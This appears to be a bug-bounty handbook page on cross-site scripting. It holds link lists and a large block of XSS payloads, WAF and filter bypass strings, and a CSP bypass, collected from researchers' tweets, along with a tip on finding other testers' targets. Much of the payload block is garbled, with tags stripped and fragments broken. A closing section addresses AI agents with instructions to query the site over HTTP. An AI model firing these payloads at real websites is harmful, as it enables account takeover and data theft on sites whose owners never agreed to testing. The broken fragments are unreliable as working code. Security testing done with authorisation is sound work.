# Cross Site Scripting (XSS) **Blogs / Articles:** * * Blind XSS - * * * * * * * * * * Upgrading Self XSS: ![https://twitter.com/hackerscrolls/status/1299711808312356865](/files/-MIQA2IDHQc74i7k7YYA) **Tools / Cheatsheets:** * * BXSS tools - * * * * * * if you google ".xss.ht" you can find where others are testing and maybe reveal some priv programs. :P **Twitter Threads:** * * * - PDF * * * * Blind XSS tip - * * **Payloads:** ``` " <, \, 'alert', parentheses, quotes and spaces #security #XSS #KNOXSS onffocusofocuscfocusufocuss="prompt(1)" - useful when waf replaces things like 'focus' to null, leaving us with onfocus="prompt(1)" - https://twitter.com/zseano/status/837160885181243392 ?x= One that should bypass some XSS filters, by @dsopas http://brutelogic.com.br/webgun/test.php?p=%3CSVG%20ONLOAD=%26%2397%26%23108%26%23101%26%23114%26%23116%281%29%3E XSS bypass for a weak filter - riyaz walikar var of "Function ('ale'+'rt(0)')()" //Firefox :) .- https://twitter.com/kinugawamasato/status/898950198826721280 #XSS Tip Smiling face with sunglasses I guess this one could solve all your HTMLi problems (regular, inline & JS block) '""); - https://twitter.com/fransrosen/status/912795907313356800 SomeTime It's Work! #XSS #Payload /> "> ">
Hello :) ^ [My favorite one - works like 80% of the time for me]. That's all for now that I'll share. Enjoy the payloads too. ;) x@x.com<--` --!> or <--` --!> https://twitter.com/DaherMohamed4/status/1277009961688719360 To test XSS + SQLi + SSTI/CSTI with the same payload use : '">{{7*7}} ' ==> for Sql injection "> ==> for XSS {{7*7}} ==> for SSTI/CSTI

CSP Bypass, script-src 'self' data: When you find input field which allows " (quotes), try this payload: "autofocus onfocus=alert(1)// -> Doesn't work "type%3d"text"autofocus%20onfocus%3d"alert(1)" -> Works Finally found my first bug on @synack ..I am just loving it. Bug: XSS through file upload. Payload: */alert(1)\x3csVg/\x3e

aa

\x3csVg/\x3e Test \">< ">< https://github.com/TheKingOfDuck/easyXssPayload/blob/master/burpXssPayload.txt HTML INJECTION + XSS INJECTION Heavy check mark //

_Y000!_ //_Y000!_ //_Y000!_ Url/?color= Payloas ">" Url/?language= Payload %22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E Url/?redirect_url= Payload javascript:alert() Without ">" (XSS) PAYLOAD PAYLOAD Bug : RXss Payload : "'`><\x00img src=xxx:x onerror=javascript:alert(1)> Final payload: The final payload : Paylaod - \">'>\"> Cross mark "'>

1 White heavy check mark "'>

1 Mi payload final fué: ">
Some payloads that worked for me in popping up a stored XSS:- 1. 2.
style="x:"> 3. \";alert('XSS');// 4. "autofocus/onfocus=alert(1)// 5. '-alert(1)-' https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XSS/XSS-OFJAAAH.txt “>< ``` {% embed url="" %} {% embed url="" %} ![](/files/-MMz2U0dY_te99rWOV-T) * Did you know \ is a thing?![Face screaming in fear](https://abs-0.twimg.com/emoji/v2/svg/1f631.svg) ![](/files/-MT4MVQRhYZXsf-CrdCx) ![](/files/-MTeRj58dzjbMWexhrnT) Y[ou can serve a XSS payload from a XML file: xss.xml: \ \ \prompt(document.domain);\ \](https://twitter.com/renniepak/status/1339523240235069440)
{% embed url="" %} DOM XSS - * XSS Tips - * {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/cross-site-scripting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.